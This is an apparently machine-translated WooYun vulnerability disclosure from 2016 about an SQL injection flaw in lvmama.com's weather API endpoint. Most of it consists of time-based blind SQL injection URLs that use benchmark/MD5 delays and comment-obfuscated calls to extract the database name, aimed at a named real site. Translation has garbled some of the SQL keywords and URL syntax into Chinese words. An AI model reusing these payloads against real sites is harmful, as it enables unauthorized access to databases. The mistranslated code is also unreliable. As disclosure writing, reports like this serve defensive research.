漏洞标题 驴妈妈主站注入界面 相关制造商 驴妈妈旅行网 漏洞作者 过路人 提交时间 2016-05-04 17: 01 公共时间 2016-06-19 14: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 注射技术 漏洞详细信息 注射点 http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC&callback=jQuery172013711762335151434_1461556777871 使用时间盲方法获取数据 http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(length/**/(database/**/())=12 ,如图1所示,基准/** /(7000000,MD5(1))))和%25271%2527=25271%&安培;回调=jQuery172013711762335151434_1461556777871 延迟约2秒 漏洞证明:
http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(ascii/**/(substr(database/**/()+从+ 1 +为+ 1))> 106,1,基准/** /(7000000,MD5(1))))和%25271%2527=25271%&安培;回调=jQuery172013711762335151434_1461556777871 最后以lmm_weather的形式获取当前数据库 修理计划: 过滤 版权声明:请注明出处。居民A @乌云